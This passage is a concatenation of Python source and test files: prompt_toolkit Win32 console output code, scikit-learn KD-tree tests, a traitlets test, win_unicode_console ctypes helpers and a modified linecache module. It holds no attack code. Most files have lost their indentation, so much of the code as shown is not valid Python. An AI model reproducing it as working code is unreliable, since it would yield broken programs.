sbinfo = self.get_win32_screen_buffer_info()
size = sbinfo.dwSize
start = sbinfo.dwCursorPosition
        # Erase from the cursor to the end of the current line, plus every row below it.
        length = ((size.X - sbinfo.dwCursorPosition.X)
                  + size.X * (size.Y - sbinfo.dwCursorPosition.Y))
self._erase(start, length)
def erase_end_of_line(self):
"""
"""
sbinfo = self.get_win32_screen_buffer_info()
start = sbinfo.dwCursorPosition
length = sbinfo.dwSize.X - sbinfo.dwCursorPosition.X
self._erase(start, length)
def _erase(self, start, length):
chars_written = c_ulong()
self._winapi(windll.kernel32.FillConsoleOutputCharacterA,
self.hconsole, c_char(b' '), DWORD(length), _coord_byval(start),
byref(chars_written))
# Reset attributes.
sbinfo = self.get_win32_screen_buffer_info()
self._winapi(windll.kernel32.FillConsoleOutputAttribute,
self.hconsole, sbinfo.wAttributes, length, _coord_byval(start),
byref(chars_written))
def reset_attributes(self):
" Reset the console foreground/background color. "
self._winapi(windll.kernel32.SetConsoleTextAttribute, self.hconsole,
self.default_attrs)
def set_attributes(self, attrs):
fgcolor, bgcolor, bold, underline, italic, blink, reverse = attrs
# Start from the default attributes.
attrs = self.default_attrs
# Override the last four bits: foreground color.
if fgcolor is not None:
attrs = attrs & ~0xf
attrs |= self.color_lookup_table.lookup_fg_color(fgcolor)
# Override the next four bits: background color.
if bgcolor is not None:
attrs = attrs & ~0xf0
attrs |= self.color_lookup_table.lookup_bg_color(bgcolor)
# Reverse: swap these four bits groups.
if reverse:
attrs = (attrs & ~0xff) | ((attrs & 0xf) << 4) | ((attrs & 0xf0) >> 4)
self._winapi(windll.kernel32.SetConsoleTextAttribute, self.hconsole, attrs)
def disable_autowrap(self):
# Not supported by Windows.
pass
def enable_autowrap(self):
# Not supported by Windows.
pass
def cursor_goto(self, row=0, column=0):
pos = COORD(x=column, y=row)
self._winapi(windll.kernel32.SetConsoleCursorPosition, self.hconsole, _coord_byval(pos))
def cursor_up(self, amount):
sr = self.get_win32_screen_buffer_info().dwCursorPosition
pos = COORD(sr.X, sr.Y - amount)
self._winapi(windll.kernel32.SetConsoleCursorPosition, self.hconsole, _coord_byval(pos))
def cursor_down(self, amount):
self.cursor_up(-amount)
def cursor_forward(self, amount):
sr = self.get_win32_screen_buffer_info().dwCursorPosition
# assert sr.X + amount >= 0, 'Negative cursor position: x=%r amount=%r' % (sr.X, amount)
pos = COORD(max(0, sr.X + amount), sr.Y)
self._winapi(windll.kernel32.SetConsoleCursorPosition, self.hconsole, _coord_byval(pos))
def cursor_backward(self, amount):
self.cursor_forward(-amount)
def flush(self):
"""
Write to output stream and flush.
"""
if not self._buffer:
# Only flush stdout buffer. (It could be that Python still has
# something in its buffer. -- We want to be sure to print that in
# the correct color.)
self.stdout.flush()
return
data = ''.join(self._buffer)
if _DEBUG_RENDER_OUTPUT:
self.LOG.write(('%r' % data).encode('utf-8') + b'\n')
self.LOG.flush()
        # Print characters one by one. This appears to be the best solution
        # in order to avoid traces of vertical lines when the completion
# menu disappears.
for b in data:
written = DWORD()
retval = windll.kernel32.WriteConsoleW(self.hconsole, b, 1, byref(written), None)
assert retval != 0
self._buffer = []
def get_rows_below_cursor_position(self):
info = self.get_win32_screen_buffer_info()
return info.srWindow.Bottom - info.dwCursorPosition.Y + 1
def scroll_buffer_to_prompt(self):
"""
To be called before drawing the prompt. This should scroll the console
to left, with the cursor at the bottom (if possible).
"""
# Get current window size
info = self.get_win32_screen_buffer_info()
sr = info.srWindow
cursor_pos = info.dwCursorPosition
result = SMALL_RECT()
# Scroll to the left.
result.Left = 0
result.Right = sr.Right - sr.Left
# Scroll vertical
win_height = sr.Bottom - sr.Top
if 0 < sr.Bottom - cursor_pos.Y < win_height - 1:
# no vertical scroll if cursor already on the screen
result.Bottom = sr.Bottom
else:
result.Bottom = max(win_height, cursor_pos.Y)
result.Top = result.Bottom - win_height
# Scroll API
self._winapi(windll.kernel32.SetConsoleWindowInfo, self.hconsole, True, byref(result))
def enter_alternate_screen(self):
"""
Go to alternate screen buffer.
"""
if not self._in_alternate_screen:
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
# Create a new console buffer and activate that one.
handle = HANDLE(self._winapi(windll.kernel32.CreateConsoleScreenBuffer, GENERIC_READ|GENERIC_WRITE,
DWORD(0), None, DWORD(1), None))
self._winapi(windll.kernel32.SetConsoleActiveScreenBuffer, handle)
self.hconsole = handle
self._in_alternate_screen = True
def quit_alternate_screen(self):
"""
Make stdout again the active buffer.
"""
if self._in_alternate_screen:
stdout = HANDLE(self._winapi(windll.kernel32.GetStdHandle, STD_OUTPUT_HANDLE))
self._winapi(windll.kernel32.SetConsoleActiveScreenBuffer, stdout)
self._winapi(windll.kernel32.CloseHandle, self.hconsole)
self.hconsole = stdout
self._in_alternate_screen = False
def enable_mouse_support(self):
ENABLE_MOUSE_INPUT = 0x10
handle = HANDLE(windll.kernel32.GetStdHandle(STD_INPUT_HANDLE))
original_mode = DWORD()
self._winapi(windll.kernel32.GetConsoleMode, handle, pointer(original_mode))
self._winapi(windll.kernel32.SetConsoleMode, handle, original_mode.value | ENABLE_MOUSE_INPUT)
def disable_mouse_support(self):
ENABLE_MOUSE_INPUT = 0x10
handle = HANDLE(windll.kernel32.GetStdHandle(STD_INPUT_HANDLE))
original_mode = DWORD()
self._winapi(windll.kernel32.GetConsoleMode, handle, pointer(original_mode))
self._winapi(windll.kernel32.SetConsoleMode, handle, original_mode.value & ~ ENABLE_MOUSE_INPUT)
def hide_cursor(self):
pass
def show_cursor(self):
pass
@classmethod
def win32_refresh_window(cls):
"""
Call win32 API to refresh the whole Window.
This is sometimes necessary when the application paints background
for completion menus. When the menu disappears, it leaves traces due
to a bug in the Windows Console. Sending a repaint request solves it.
"""
# Get console handle
handle = HANDLE(windll.kernel32.GetConsoleWindow())
RDW_INVALIDATE = 0x0001
windll.user32.RedrawWindow(handle, None, None, c_uint(RDW_INVALIDATE))
class FOREGROUND_COLOR:
BLACK = 0x0000
BLUE = 0x0001
GREEN = 0x0002
CYAN = 0x0003
RED = 0x0004
MAGENTA = 0x0005
YELLOW = 0x0006
GRAY = 0x0007
INTENSITY = 0x0008 # Foreground color is intensified.
class BACKROUND_COLOR:
BLACK = 0x0000
BLUE = 0x0010
GREEN = 0x0020
CYAN = 0x0030
RED = 0x0040
MAGENTA = 0x0050
YELLOW = 0x0060
GRAY = 0x0070
INTENSITY = 0x0080 # Background color is intensified.
def _create_ansi_color_dict(color_cls):
" Create a table that maps the 16 named ansi colors to their Windows code. "
return {
'ansidefault': color_cls.BLACK,
'ansiblack': color_cls.BLACK,
'ansidarkgray': color_cls.BLACK | color_cls.INTENSITY,
'ansilightgray': color_cls.GRAY,
'ansiwhite': color_cls.GRAY | color_cls.INTENSITY,
# Low intensity.
'ansidarkred': color_cls.RED,
'ansidarkgreen': color_cls.GREEN,
'ansibrown': color_cls.YELLOW,
'ansidarkblue': color_cls.BLUE,
'ansipurple': color_cls.MAGENTA,
'ansiteal': color_cls.CYAN,
# High intensity.
'ansired': color_cls.RED | color_cls.INTENSITY,
'ansigreen': color_cls.GREEN | color_cls.INTENSITY,
'ansiyellow': color_cls.YELLOW | color_cls.INTENSITY,
'ansiblue': color_cls.BLUE | color_cls.INTENSITY,
'ansifuchsia': color_cls.MAGENTA | color_cls.INTENSITY,
'ansiturquoise': color_cls.CYAN | color_cls.INTENSITY,
}
FG_ANSI_COLORS = _create_ansi_color_dict(FOREGROUND_COLOR)
BG_ANSI_COLORS = _create_ansi_color_dict(BACKROUND_COLOR)
assert set(FG_ANSI_COLORS) == set(ANSI_COLOR_NAMES)
assert set(BG_ANSI_COLORS) == set(ANSI_COLOR_NAMES)
class ColorLookupTable(object):
"""
Inspired by pygments/formatters/terminal256.py
"""
def __init__(self):
self._win32_colors = self._build_color_table()
self.best_match = {} # Cache
@staticmethod
def _build_color_table():
"""
Build an RGB-to-256 color conversion table
"""
FG = FOREGROUND_COLOR
BG = BACKROUND_COLOR
return [
(0x00, 0x00, 0x00, FG.BLACK, BG.BLACK),
(0x00, 0x00, 0xaa, FG.BLUE, BG.BLUE),
(0x00, 0xaa, 0x00, FG.GREEN, BG.GREEN),
(0x00, 0xaa, 0xaa, FG.CYAN, BG.CYAN),
(0xaa, 0x00, 0x00, FG.RED, BG.RED),
(0xaa, 0x00, 0xaa, FG.MAGENTA, BG.MAGENTA),
(0xaa, 0xaa, 0x00, FG.YELLOW, BG.YELLOW),
(0x88, 0x88, 0x88, FG.GRAY, BG.GRAY),
(0x44, 0x44, 0xff, FG.BLUE | FG.INTENSITY, BG.BLUE | BG.INTENSITY),
(0x44, 0xff, 0x44, FG.GREEN | FG.INTENSITY, BG.GREEN | BG.INTENSITY),
(0x44, 0xff, 0xff, FG.CYAN | FG.INTENSITY, BG.CYAN | BG.INTENSITY),
(0xff, 0x44, 0x44, FG.RED | FG.INTENSITY, BG.RED | BG.INTENSITY),
(0xff, 0x44, 0xff, FG.MAGENTA | FG.INTENSITY, BG.MAGENTA | BG.INTENSITY),
(0xff, 0xff, 0x44, FG.YELLOW | FG.INTENSITY, BG.YELLOW | BG.INTENSITY),
(0x44, 0x44, 0x44, FG.BLACK | FG.INTENSITY, BG.BLACK | BG.INTENSITY),
(0xff, 0xff, 0xff, FG.GRAY | FG.INTENSITY, BG.GRAY | BG.INTENSITY),
]
def _closest_color(self, r, g, b):
distance = 257 * 257 * 3 # "infinity" (>distance from #000000 to #ffffff)
fg_match = 0
bg_match = 0
for r_, g_, b_, fg_, bg_ in self._win32_colors:
rd = r - r_
gd = g - g_
bd = b - b_
d = rd * rd + gd * gd + bd * bd
if d < distance:
fg_match = fg_
bg_match = bg_
distance = d
return fg_match, bg_match
def _color_indexes(self, color):
indexes = self.best_match.get(color, None)
if indexes is None:
try:
rgb = int(str(color), 16)
except ValueError:
rgb = 0
r = (rgb >> 16) & 0xff
g = (rgb >> 8) & 0xff
b = rgb & 0xff
indexes = self._closest_color(r, g, b)
self.best_match[color] = indexes
return indexes
def lookup_fg_color(self, fg_color):
"""
Return the color for use in the
`windll.kernel32.SetConsoleTextAttribute` API call.
:param fg_color: Foreground as text. E.g. 'ffffff' or 'red'
"""
# Foreground.
if fg_color in FG_ANSI_COLORS:
return FG_ANSI_COLORS[fg_color]
else:
return self._color_indexes(fg_color)[0]
def lookup_bg_color(self, bg_color):
"""
Return the color for use in the
`windll.kernel32.SetConsoleTextAttribute` API call.
:param bg_color: Background as text. E.g. 'ffffff' or 'red'
"""
# Background.
if bg_color in BG_ANSI_COLORS:
return BG_ANSI_COLORS[bg_color]
else:
return self._color_indexes(bg_color)[1]
```
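The color mapping above can be exercised on its own as sketched below; note the import only works on Windows, because the module pulls in `ctypes.windll` at import time.
```python
# Windows-only sketch (the module imports ctypes.windll); values shown are
# console attribute bits, not ANSI escape codes.
from prompt_toolkit.terminal.win32_output import ColorLookupTable

table = ColorLookupTable()
print(table.lookup_fg_color('ansired'))  # named ANSI color -> attribute bits
print(table.lookup_fg_color('ff8800'))   # 'rrggbb' hex -> nearest of 16 colors
```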
#### File: py2/tests/test_print_tokens.py
```python
from __future__ import unicode_literals
from prompt_toolkit.shortcuts import print_tokens
from prompt_toolkit.token import Token
from prompt_toolkit.styles import style_from_dict
class _Capture:
" Emulate an stdout object. "
encoding = 'utf-8'
def __init__(self):
self._data = []
def write(self, data):
self._data.append(data)
@property
def data(self):
return b''.join(self._data)
def flush(self):
pass
def isatty(self):
return True
def test_print_tokens():
f = _Capture()
print_tokens([(Token, 'hello'), (Token, 'world')], file=f)
assert b'hello' in f.data
assert b'world' in f.data
def test_with_style():
f = _Capture()
style = style_from_dict({
Token.Hello: '#ff0066',
Token.World: '#44ff44 italic',
})
tokens = [
(Token.Hello, 'Hello '),
(Token.World, 'world'),
]
print_tokens(tokens, style=style, file=f)
assert b'\x1b[0;38;5;197mHello' in f.data
assert b'\x1b[0;38;5;83;3mworld' in f.data
```
#### File: neighbors/tests/test_kd_tree.py
```python
import numpy as np
from numpy.testing import assert_array_almost_equal
from sklearn.neighbors.kd_tree import (KDTree, NeighborsHeap,
simultaneous_sort, kernel_norm,
nodeheap_sort, DTYPE, ITYPE)
from sklearn.neighbors.dist_metrics import DistanceMetric
from sklearn.utils.testing import SkipTest, assert_allclose
V = np.random.random((3, 3))
V = np.dot(V, V.T)
DIMENSION = 3
METRICS = {'euclidean': {},
'manhattan': {},
'chebyshev': {},
'minkowski': dict(p=3)}
def brute_force_neighbors(X, Y, k, metric, **kwargs):
D = DistanceMetric.get_metric(metric, **kwargs).pairwise(Y, X)
ind = np.argsort(D, axis=1)[:, :k]
dist = D[np.arange(Y.shape[0])[:, None], ind]
return dist, ind
def test_kd_tree_query():
np.random.seed(0)
X = np.random.random((40, DIMENSION))
Y = np.random.random((10, DIMENSION))
def check_neighbors(dualtree, breadth_first, k, metric, kwargs):
kdt = KDTree(X, leaf_size=1, metric=metric, **kwargs)
dist1, ind1 = kdt.query(Y, k, dualtree=dualtree,
breadth_first=breadth_first)
dist2, ind2 = brute_force_neighbors(X, Y, k, metric, **kwargs)
# don't check indices here: if there are any duplicate distances,
# the indices may not match. Distances should not have this problem.
assert_array_almost_equal(dist1, dist2)
for (metric, kwargs) in METRICS.items():
for k in (1, 3, 5):
for dualtree in (True, False):
for breadth_first in (True, False):
yield (check_neighbors,
dualtree, breadth_first,
k, metric, kwargs)
def test_kd_tree_query_radius(n_samples=100, n_features=10):
np.random.seed(0)
X = 2 * np.random.random(size=(n_samples, n_features)) - 1
query_pt = np.zeros(n_features, dtype=float)
eps = 1E-15 # roundoff error can cause test to fail
kdt = KDTree(X, leaf_size=5)
rad = np.sqrt(((X - query_pt) ** 2).sum(1))
for r in np.linspace(rad[0], rad[-1], 100):
ind = kdt.query_radius([query_pt], r + eps)[0]
i = np.where(rad <= r + eps)[0]
ind.sort()
i.sort()
assert_array_almost_equal(i, ind)
def test_kd_tree_query_radius_distance(n_samples=100, n_features=10):
np.random.seed(0)
X = 2 * np.random.random(size=(n_samples, n_features)) - 1
query_pt = np.zeros(n_features, dtype=float)
eps = 1E-15 # roundoff error can cause test to fail
kdt = KDTree(X, leaf_size=5)
rad = np.sqrt(((X - query_pt) ** 2).sum(1))
for r in np.linspace(rad[0], rad[-1], 100):
ind, dist = kdt.query_radius([query_pt], r + eps, return_distance=True)
ind = ind[0]
dist = dist[0]
d = np.sqrt(((query_pt - X[ind]) ** 2).sum(1))
assert_array_almost_equal(d, dist)
def compute_kernel_slow(Y, X, kernel, h):
d = np.sqrt(((Y[:, None, :] - X) ** 2).sum(-1))
norm = kernel_norm(h, X.shape[1], kernel)
if kernel == 'gaussian':
return norm * np.exp(-0.5 * (d * d) / (h * h)).sum(-1)
elif kernel == 'tophat':
return norm * (d < h).sum(-1)
elif kernel == 'epanechnikov':
return norm * ((1.0 - (d * d) / (h * h)) * (d < h)).sum(-1)
elif kernel == 'exponential':
return norm * (np.exp(-d / h)).sum(-1)
elif kernel == 'linear':
return norm * ((1 - d / h) * (d < h)).sum(-1)
elif kernel == 'cosine':
return norm * (np.cos(0.5 * np.pi * d / h) * (d < h)).sum(-1)
else:
raise ValueError('kernel not recognized')
def test_kd_tree_kde(n_samples=100, n_features=3):
np.random.seed(0)
X = np.random.random((n_samples, n_features))
Y = np.random.random((n_samples, n_features))
kdt = KDTree(X, leaf_size=10)
for kernel in ['gaussian', 'tophat', 'epanechnikov',
'exponential', 'linear', 'cosine']:
for h in [0.01, 0.1, 1]:
dens_true = compute_kernel_slow(Y, X, kernel, h)
def check_results(kernel, h, atol, rtol, breadth_first):
dens = kdt.kernel_density(Y, h, atol=atol, rtol=rtol,
kernel=kernel,
breadth_first=breadth_first)
assert_allclose(dens, dens_true, atol=atol,
rtol=max(rtol, 1e-7))
for rtol in [0, 1E-5]:
for atol in [1E-6, 1E-2]:
for breadth_first in (True, False):
yield (check_results, kernel, h, atol, rtol,
breadth_first)
import pytest
@pytest.mark.xfail
def test_gaussian_kde(n_samples=1000):
# Compare gaussian KDE results to scipy.stats.gaussian_kde
from scipy.stats import gaussian_kde
np.random.seed(0)
x_in = np.random.normal(0, 1, n_samples)
x_out = np.linspace(-5, 5, 30)
for h in [0.01, 0.1, 1]:
kdt = KDTree(x_in[:, None])
try:
gkde = gaussian_kde(x_in, bw_method=h / np.std(x_in))
except TypeError:
raise SkipTest("Old scipy, does not accept explicit bandwidth.")
dens_kdt = kdt.kernel_density(x_out[:, None], h) / n_samples
dens_gkde = gkde.evaluate(x_out)
assert_array_almost_equal(dens_kdt, dens_gkde, decimal=3)
def test_kd_tree_two_point(n_samples=100, n_features=3):
np.random.seed(0)
X = np.random.random((n_samples, n_features))
Y = np.random.random((n_samples, n_features))
r = np.linspace(0, 1, 10)
kdt = KDTree(X, leaf_size=10)
D = DistanceMetric.get_metric("euclidean").pairwise(Y, X)
counts_true = [(D <= ri).sum() for ri in r]
def check_two_point(r, dualtree):
counts = kdt.two_point_correlation(Y, r=r, dualtree=dualtree)
assert_array_almost_equal(counts, counts_true)
for dualtree in (True, False):
yield check_two_point, r, dualtree
def test_kd_tree_pickle():
import pickle
np.random.seed(0)
X = np.random.random((10, 3))
kdt1 = KDTree(X, leaf_size=1)
ind1, dist1 = kdt1.query(X)
def check_pickle_protocol(protocol):
s = pickle.dumps(kdt1, protocol=protocol)
kdt2 = pickle.loads(s)
ind2, dist2 = kdt2.query(X)
assert_array_almost_equal(ind1, ind2)
assert_array_almost_equal(dist1, dist2)
for protocol in (0, 1, 2):
yield check_pickle_protocol, protocol
def test_neighbors_heap(n_pts=5, n_nbrs=10):
heap = NeighborsHeap(n_pts, n_nbrs)
for row in range(n_pts):
d_in = np.random.random(2 * n_nbrs).astype(DTYPE)
i_in = np.arange(2 * n_nbrs, dtype=ITYPE)
for d, i in zip(d_in, i_in):
heap.push(row, d, i)
ind = np.argsort(d_in)
d_in = d_in[ind]
i_in = i_in[ind]
d_heap, i_heap = heap.get_arrays(sort=True)
assert_array_almost_equal(d_in[:n_nbrs], d_heap[row])
assert_array_almost_equal(i_in[:n_nbrs], i_heap[row])
def test_node_heap(n_nodes=50):
vals = np.random.random(n_nodes).astype(DTYPE)
i1 = np.argsort(vals)
vals2, i2 = nodeheap_sort(vals)
assert_array_almost_equal(i1, i2)
assert_array_almost_equal(vals[i1], vals2)
def test_simultaneous_sort(n_rows=10, n_pts=201):
dist = np.random.random((n_rows, n_pts)).astype(DTYPE)
ind = (np.arange(n_pts) + np.zeros((n_rows, 1))).astype(ITYPE)
dist2 = dist.copy()
ind2 = ind.copy()
# simultaneous sort rows using function
simultaneous_sort(dist, ind)
# simultaneous sort rows using numpy
i = np.argsort(dist2, axis=1)
row_ind = np.arange(n_rows)[:, None]
dist2 = dist2[row_ind, i]
ind2 = ind2[row_ind, i]
assert_array_almost_equal(dist, dist2)
assert_array_almost_equal(ind, ind2)
```
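The public API those tests rely on reduces to the hedged sketch below; recent scikit-learn exposes `KDTree` as `sklearn.neighbors.KDTree` rather than the private `kd_tree` module used above.
```python
# Sketch; assumes numpy and scikit-learn are installed.
import numpy as np
from sklearn.neighbors import KDTree

rng = np.random.RandomState(0)
X = rng.random_sample((40, 3))

tree = KDTree(X, leaf_size=5, metric='euclidean')
dist, ind = tree.query(X[:2], k=3)                         # 3 nearest neighbours
count = tree.query_radius(X[:1], r=0.3, count_only=True)   # neighbours within r
print(dist.shape, ind.shape, count)
```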
#### File: utils/tests/test_bunch.py
```python
from traitlets.utils.bunch import Bunch
def test_bunch():
b = Bunch(x=5, y=10)
assert 'y' in b
assert 'x' in b
assert b.x == 5
b['a'] = 'hi'
assert b.a == 'hi'
def test_bunch_dir():
b = Bunch(x=5, y=10)
assert 'x' in dir(b)
assert 'keys' in dir(b)
```
#### File: win_unicode_console/win_unicode_console/buffer.py
```python
import ctypes
from ctypes import (byref, POINTER, pythonapi,
c_int, c_char, c_char_p, c_void_p, py_object, c_ssize_t)
from .info import PY2
c_ssize_p = POINTER(c_ssize_t)
PyObject_GetBuffer = pythonapi.PyObject_GetBuffer
PyBuffer_Release = pythonapi.PyBuffer_Release
PyBUF_SIMPLE = 0
PyBUF_WRITABLE = 1
class Py_buffer(ctypes.Structure):
_fields_ = [
("buf", c_void_p),
("obj", py_object),
("len", c_ssize_t),
("itemsize", c_ssize_t),
("readonly", c_int),
("ndim", c_int),
("format", c_char_p),
("shape", c_ssize_p),
("strides", c_ssize_p),
("suboffsets", c_ssize_p),
("internal", c_void_p)
]
if PY2:
_fields_.insert(-1, ("smalltable", c_ssize_t * 2))
@classmethod
def get_from(cls, obj, flags=PyBUF_SIMPLE):
buf = cls()
PyObject_GetBuffer(py_object(obj), byref(buf), flags)
return buf
def release(self):
PyBuffer_Release(byref(self))
def get_buffer(obj, writable=False):
buf = Py_buffer.get_from(obj, PyBUF_WRITABLE if writable else PyBUF_SIMPLE)
try:
buffer_type = c_char * buf.len
return buffer_type.from_address(buf.buf)
finally:
buf.release()
```
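A hedged sketch of what `get_buffer` returns: a ctypes char array aliasing the object's memory, so writes through it show up in the original object (as long as that object is not resized).
```python
# Illustrative sketch; assumes the win_unicode_console package is importable.
from win_unicode_console.buffer import get_buffer

data = bytearray(b"hello")
buf = get_buffer(data, writable=True)  # c_char array over the same memory
buf[0] = b"H"
print(bytes(data))  # b'Hello'
```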
#### File: win_unicode_console/win_unicode_console/__init__.py
```python
from . import streams, console #, readline_hook
from .info import WINDOWS, PY2
if PY2:
from . import raw_input
if PY2 and WINDOWS:
from . import unicode_argv
# PY3 # def enable(*,
def enable(
stdin = Ellipsis,
stdout = Ellipsis,
stderr = Ellipsis,
use_readline_hook = False,
use_pyreadline = True,
use_raw_input = True, # PY2
raw_input__return_unicode = raw_input.RETURN_UNICODE if PY2 else None,
use_unicode_argv = False, # PY2, has some issues
use_repl = False#,
):
if not WINDOWS:
return
streams.enable(stdin=stdin, stdout=stdout, stderr=stderr)
#if use_readline_hook:
# readline_hook.enable(use_pyreadline=use_pyreadline)
if PY2 and use_raw_input:
raw_input.enable(raw_input__return_unicode)
if PY2 and use_unicode_argv:
unicode_argv.enable()
if use_repl:
console.enable()
def disable():
if not WINDOWS:
return
if console.running_console is not None:
console.disable()
if PY2:
unicode_argv.disable()
raw_input.disable()
#readline_hook.disable()
streams.disable()
```
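The intended entry point is a single `enable()` call at startup (a no-op outside Windows), optionally paired with `disable()`. A minimal sketch, assuming the package is installed under its usual name:
```python
# Minimal usage sketch; enable() returns immediately on non-Windows platforms.
import win_unicode_console
win_unicode_console.enable()      # swap in Unicode-aware console streams
try:
    print("héllo wörld")          # now survives the legacy Windows console
finally:
    win_unicode_console.disable() # restore the original streams
```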
#### File: win_unicode_console/win_unicode_console/readline_hook.py
```python
from __future__ import print_function # PY2
import sys
import traceback
import warnings
import ctypes.util
from ctypes import (pythonapi, cdll, cast,
c_char_p, c_void_p, c_size_t, CFUNCTYPE)
from .info import WINDOWS
try:
import pyreadline
except ImportError:
pyreadline = None
def get_libc():
if WINDOWS:
path = "msvcrt"
else:
path = ctypes.util.find_library("c")
if path is None:
raise RuntimeError("cannot locate libc")
return cdll[path]
LIBC = get_libc()
PyMem_Malloc = pythonapi.PyMem_Malloc
PyMem_Malloc.restype = c_size_t
PyMem_Malloc.argtypes = [c_size_t]
strncpy = LIBC.strncpy
strncpy.restype = c_char_p
strncpy.argtypes = [c_char_p, c_char_p, c_size_t]
HOOKFUNC = CFUNCTYPE(c_char_p, c_void_p, c_void_p, c_char_p)
#PyOS_ReadlineFunctionPointer = c_void_p.in_dll(pythonapi, "PyOS_ReadlineFunctionPointer")
def new_zero_terminated_string(b):
p = PyMem_Malloc(len(b) + 1)
strncpy(cast(p, c_char_p), b, len(b) + 1)
return p
def check_encodings():
if sys.stdin.encoding != sys.stdout.encoding:
# raise RuntimeError("sys.stdin.encoding != sys.stdout.encoding, readline hook doesn't know, which one to use to decode prompt")
warnings.warn("sys.stdin.encoding == {!r}, whereas sys.stdout.encoding == {!r}, readline hook consumer may assume they are the same".format(sys.stdin.encoding, sys.stdout.encoding),
RuntimeWarning, stacklevel=3)
def stdio_readline(prompt=""):
sys.stdout.write(prompt)
sys.stdout.flush()
return sys.stdin.readline()
class ReadlineHookManager:
def __init__(self):
self.readline_wrapper_ref = HOOKFUNC(self.readline_wrapper)
self.address = cast(self.readline_wrapper_ref, c_void_p).value
#self.original_address = PyOS_ReadlineFunctionPointer.value
self.readline_hook = None
def readline_wrapper(self, stdin, stdout, prompt):
try:
try:
check_encodings()
except RuntimeError:
traceback.print_exc(file=sys.stderr)
try:
prompt = prompt.decode("utf-8")
except UnicodeDecodeError:
prompt = ""
else:
prompt = prompt.decode(sys.stdout.encoding)
try:
line = self.readline_hook(prompt)
except KeyboardInterrupt:
return 0
else:
return new_zero_terminated_string(line.encode(sys.stdin.encoding))
except:
self.restore_original()
print("Internal win_unicode_console error, disabling custom readline hook...", file=sys.stderr)
traceback.print_exc(file=sys.stderr)
return new_zero_terminated_string(b"\n")
def install_hook(self, hook):
self.readline_hook = hook
PyOS_ReadlineFunctionPointer.value = self.address
def restore_original(self):
self.readline_hook = None
PyOS_ReadlineFunctionPointer.value = self.original_address
class PyReadlineManager:
def __init__(self):
self.original_codepage = pyreadline.unicode_helper.pyreadline_codepage
def set_codepage(self, codepage):
pyreadline.unicode_helper.pyreadline_codepage = codepage
def restore_original(self):
self.set_codepage(self.original_codepage)
def pyreadline_is_active():
if not pyreadline:
return False
ref = pyreadline.console.console.readline_ref
if ref is None:
return False
return cast(ref, c_void_p).value == PyOS_ReadlineFunctionPointer.value
manager = ReadlineHookManager()
if pyreadline:
pyreadline_manager = PyReadlineManager()
# PY3 # def enable(*, use_pyreadline=True):
def enable(use_pyreadline=True):
check_encodings()
if use_pyreadline and pyreadline:
pyreadline_manager.set_codepage(sys.stdin.encoding)
# pyreadline assumes that encoding of all sys.stdio objects is the same
if not pyreadline_is_active():
manager.install_hook(stdio_readline)
else:
manager.install_hook(stdio_readline)
def disable():
if pyreadline:
pyreadline_manager.restore_original()
else:
manager.restore_original()
```
#### File: src/Lib/linecache.py
```python
import functools
import sys
import os
import tokenize
__all__ = ["getline", "clearcache", "checkcache", "lazycache"]
# The cache. Maps filenames to either a thunk which will provide source code,
# or a tuple (size, mtime, lines, fullname) once loaded.
cache = {}
def clearcache():
"""Clear the cache entirely."""
cache.clear()
def getline(filename, lineno, module_globals=None):
"""Get a line for a Python source file from the cache.
Update the cache if it doesn't contain an entry for this file already."""
lines = getlines(filename, module_globals)
if 1 <= lineno <= len(lines):
return lines[lineno - 1]
return ''
def getlines(filename, module_globals=None):
"""Get the lines for a Python source file from the cache.
Update the cache if it doesn't contain an entry for this file already."""
if filename in cache:
entry = cache[filename]
if len(entry) != 1:
return cache[filename][2]
try:
return updatecache(filename, module_globals)
except MemoryError:
clearcache()
return []
def checkcache(filename=None):
"""Discard cache entries that are out of date.
(This is not checked upon each call!)"""
if filename is None:
filenames = list(cache.keys())
elif filename in cache:
filenames = [filename]
else:
return
for filename in filenames:
entry = cache[filename]
if len(entry) == 1:
# lazy cache entry, leave it lazy.
continue
size, mtime, lines, fullname = entry
if mtime is None:
continue # no-op for files loaded via a __loader__
try:
stat = os.stat(fullname)
except OSError:
cache.pop(filename, None)
continue
if size != stat.st_size or mtime != stat.st_mtime:
cache.pop(filename, None)
def updatecache(filename, module_globals=None):
"""Update a cache entry and return its list of lines.
If something's wrong, print a message, discard the cache entry,
and return an empty list."""
if filename in cache:
if len(cache[filename]) != 1:
cache.pop(filename, None)
if not filename or (filename.startswith('<') and filename.endswith('>')):
return []
if not os.path.isabs(filename):
# Do not read builtin code from the filesystem.
import __res
key = __res.importer.file_source(filename)
if key:
data = __res.find(key)
assert data is not None, filename
data = data.decode('UTF-8')
lines = [line + '\n' for line in data.splitlines()]
cache[filename] = (len(data), None, lines, filename)
return cache[filename][2]
fullname = filename
try:
stat = os.stat(fullname)
except OSError:
basename = filename
# Realise a lazy loader based lookup if there is one
# otherwise try to lookup right now.
if lazycache(filename, module_globals):
try:
data = cache[filename][0]()
except (ImportError, OSError):
pass
else:
if data is None:
# No luck, the PEP302 loader cannot find the source
# for this module.
return []
cache[filename] = (
len(data),
None,
[line + '\n' for line in data.splitlines()],
fullname
)
return cache[filename][2]
# Try looking through the module search path, which is only useful
# when handling a relative filename.
if os.path.isabs(filename):
return []
for dirname in sys.path:
try:
fullname = os.path.join(dirname, basename)
except (TypeError, AttributeError):
# Not sufficiently string-like to do anything useful with.
continue
try:
stat = os.stat(fullname)
break
except OSError:
pass
else:
return []
try:
with tokenize.open(fullname) as fp:
lines = fp.readlines()
except OSError:
return []
if lines and not lines[-1].endswith('\n'):
lines[-1] += '\n'
size, mtime = stat.st_size, stat.st_mtime
cache[filename] = size, mtime, lines, fullname
return lines
def lazycache(filename, module_globals):
"""Seed the cache for filename with module_globals.
The module loader will be asked for the source only when getlines is
called, not immediately.
If there is an entry in the cache already, it is not altered.
:return: True if a lazy load is registered in the cache,
otherwise False. To register such a load a module loader with a
get_source method must be found, the filename must be a cacheable
filename, and the filename must not be already cached.
"""
if filename in cache:
if len(cache[filename]) == 1:
return True
else:
return False
if not filename or (filename.startswith('<') and filename.endswith('>')):
return False
# Try for a __loader__, if available
if module_globals and '__loader__' in module_globals:
name = module_globals.get('__name__')
loader = module_globals['__loader__']
get_source = getattr(loader, 'get_source', None)
if name and get_source:
get_lines = functools.partial(get_source, name)
cache[filename] = (get_lines,)
return True
return False
```
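This build keeps the same public interface as the standard-library `linecache`, so the usual access pattern applies; a short sketch:
```python
# Usage sketch of the linecache API shown above.
import linecache
line = linecache.getline(__file__, 1)   # read (and cache) the first line of this file
print(line.rstrip())
linecache.checkcache(__file__)          # drop the entry if the file changed on disk
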